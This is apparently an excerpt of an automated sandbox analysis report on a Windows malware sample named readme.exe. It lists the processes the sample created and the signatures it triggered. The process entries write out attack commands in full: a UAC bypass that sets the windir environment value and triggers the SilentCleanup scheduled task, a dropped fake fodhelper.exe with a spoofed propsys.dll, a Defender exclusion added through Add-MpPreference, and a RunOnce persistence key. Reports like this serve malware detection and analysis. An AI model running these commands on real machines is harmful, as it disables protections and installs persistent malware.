Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM 'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /IJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\fodhelper.exe C:\Windows \System32\fodhelper.exeJump to behavior
Source: C:\Windows \System32\fodhelper.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\x.batJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\Users\Public\x.vbsJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\x.vbs' Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\cde.bat' 'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Htdr Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe' Jump to behavior
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Natso.bat' '
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add hkcu\Environment /v windir /d 'cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM '
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe 'C:\Users\user\AppData\Local\Htdr\Htdrset.exe'
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\readme.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9FC8E510-A27C-4B3B-B9A3-BF65F00256A8}\InProcServer32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Users\user\Desktop\readme.exeFile opened: C:\Windows\SysWOW64\RICHED32.DLLJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: FodHelper.pdb source: Htdrset.exe, fodhelper.exe.8.dr
Source: Binary string: FodHelper.pdbGCTL source: readme.exe, 00000000.00000002.675597032.00000000048E0000.00000004.00000001.sdmp, fodhelper.exe, 0000000A.00000002.629081945.00007FF6CFEDA000.00000002.00020000.sdmp, Htdrset.exe, 00000015.00000002.720540392.0000000002C30000.00000004.00000001.sdmp, Htdrset.exe, 0000001D.00000002.723220487.0000000002820000.00000004.00000001.sdmp, fodhelper.exe.8.dr

Data Obfuscation:

Detected unpacking (creates a PE file in dynamic memory)
Source: C:\Users\user\Desktop\readme.exe | Unpacked PE file: 0.2.readme.exe.10530000.7.unpack
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Unpacked PE file: 21.2.Htdrset.exe.10530000.7.unpack
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Unpacked PE file: 29.2.Htdrset.exe.10530000.7.unpack
Binary contains a suspicious time stamp
Source: initial sample | Static PE information: 0xB1EB5A0E [Sun Aug 3 12:14:06 2064 UTC]
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_00476B04 VirtualAlloc,VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect, 0_2_00476B04
PE file contains sections with non-standard names
Source: fodhelper.exe.8.dr | Static PE information: section name: .imrsiv
Source: propsys.dll.8.dr | Static PE information: section name: .xdata
Source: propsys.dll.8.dr | Static PE information: section name: /4
Source: propsys.dll.8.dr | Static PE information: section name: /19
Source: propsys.dll.8.dr | Static PE information: section name: /31
Source: propsys.dll.8.dr | Static PE information: section name: /45
Source: propsys.dll.8.dr | Static PE information: section name: /57
Source: propsys.dll.8.dr | Static PE information: section name: /70
Source: propsys.dll.8.dr | Static PE information: section name: /81
Source: propsys.dll.8.dr | Static PE information: section name: /92
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_004930AC push 00493125h; ret 0_2_0049311D
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_004935D0 push 0049365Dh; ret 0_2_00493655
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_69C90DFE push rsp; iretd 10_2_69C90DFF
Source: C:\Windows \System32\fodhelper.exe | Code function: 10_2_69C8F018 pushfq ; iretd 10_2_69C8F02A
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_004139B0 push eax; ret 20_2_004139DE
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_105451F8 push eax; ret 20_2_10545226
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_1054D3A2 push dword ptr [ebp+753F20E5h]; retf 20_2_1054D3BD
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004930AC push 00493125h; ret 21_2_0049311D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004935D0 push 0049365Dh; ret 21_2_00493655
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00432008 push 0043204Bh; ret 21_2_00432043
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00492030 push 00492056h; ret 21_2_0049204E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004640DC push 00464136h; ret 21_2_0046412E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00416174 push ecx; mov dword ptr [esp], edx 21_2_00416175
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004141D4 push ecx; mov dword ptr [esp], edx 21_2_004141D9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004561E8 push 00456214h; ret 21_2_0045620C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004142F4 push ecx; mov dword ptr [esp], edx 21_2_004142F9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00414338 push ecx; mov dword ptr [esp], edx 21_2_0041433D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00428394 push 00428464h; ret 21_2_0042845C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_0043445C push 00434488h; ret 21_2_00434480
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_00412424 push 00412471h; ret 21_2_00412469
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_0041E528 push 0041E554h; ret 21_2_0041E54C
Source: C:\Windows\SysWOW64\mshta.exe | Code function: 26_2_054EF86E push esi; retf 26_2_054EF88D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004930AC push 00493125h; ret 29_2_0049311D
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004935D0 push 0049365Dh; ret 29_2_00493655
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_00432008 push 0043204Bh; ret 29_2_00432043
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_00492030 push 00492056h; ret 29_2_0049204E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004640DC push 00464136h; ret 29_2_0046412E
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_00416174 push ecx; mov dword ptr [esp], edx 29_2_00416175
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004141D4 push ecx; mov dword ptr [esp], edx 29_2_004141D9
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004561E8 push 00456214h; ret 29_2_0045620C
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004142F4 push ecx; mov dword ptr [esp], edx 29_2_004142F9

Persistence and Installation Behavior:

Drops executables to the windows directory (C:\Windows) and starts them
Source: C:\Windows \System32\fodhelper.exe | Executable created and started: C:\Windows \System32\fodhelper.exe
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\SysWOW64\cmd.exe | Process created: reg.exe (6 occurrences)
Contains functionality to download and launch executables
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_0040D427 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,ShellExecuteW,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,free,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 20_2_0040D427
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\fodhelper.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\propsys.dll
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\propsys.dll
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\user\AppData\Local\Htdr\Htdrset.exe
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\fodhelper.exe
Drops PE files to the user directory
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\propsys.dll
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\fodhelper.exe
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\fodhelper.exe
Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Windows \System32\propsys.dll

Boot Survival:

Drops PE files to the user root directory
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\propsys.dll
Source: C:\Users\user\Desktop\readme.exe | File created: C:\Users\Public\fodhelper.exe
Uses schtasks.exe or at.exe to add and modify task schedules
Source: unknown | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
Contains functionality to start windows services
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_004111A9 OpenSCManagerW,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ, 20_2_004111A9
Creates an autostart registry key
Source: C:\Users\user\Desktop\readme.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Htdr

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (37).png
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Users\user\Desktop\readme.exe | Code function: 0_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 0_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 21_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004620EC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 21_2_004620EC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_004621B0 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 21_2_004621B0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 21_2_0045E4F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 21_2_0045E4F8
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004619BC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 29_2_004619BC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004620EC IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA, 29_2_004620EC
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_004621B0 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus, 29_2_004621B0
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0045E4F8 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,ShowWindow, 29_2_0045E4F8
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0044C640 IsIconic,GetCapture, 29_2_0044C640
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0044CF48 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 29_2_0044CF48
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0044D918 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 29_2_0044D918
Source: C:\Users\user\AppData\Local\Htdr\Htdrset.exe | Code function: 29_2_0041DFE0 IsIconic,GetWindowPlacement,GetWindowRect, 29_2_0041DFE0
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 20_2_004099CD LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress, 20_2_004099CD
Disables application error messages (SetErrorMode)
Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEE